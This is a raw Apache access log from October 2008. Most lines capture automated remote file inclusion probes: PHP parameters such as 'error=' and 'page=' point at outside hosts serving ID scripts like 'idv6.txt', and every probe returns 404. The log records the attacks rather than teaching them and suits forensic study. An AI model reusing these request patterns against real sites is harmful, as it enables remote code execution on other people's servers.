217.69.210.130 - - [03/Oct/2008:01:24:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 3M/IE 6.0;; 3M/MSIE 6.0;; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
74.53.127.68 - - [03/Oct/2008:01:24:47 -0400] "GET /logs/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:01:24:47 -0400] "GET /errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:01:24:47 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
151.1.24.160 - - [03/Oct/2008:01:25:08 -0400] "GET /logs/error_log.Q108082200//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
75.125.146.130 - - [03/Oct/2008:01:25:14 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:01:25:15 -0400] "GET /errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:01:25:15 -0400] "GET /logs/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 [en] (OS/2; U)"
160.99.12.231 - - [03/Oct/2008:01:25:34 -0400] "GET /logs/error_log.Q108061400/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:25:35 -0400] "GET /senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:25:35 -0400] "GET /logs/error_log.Q108061400/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
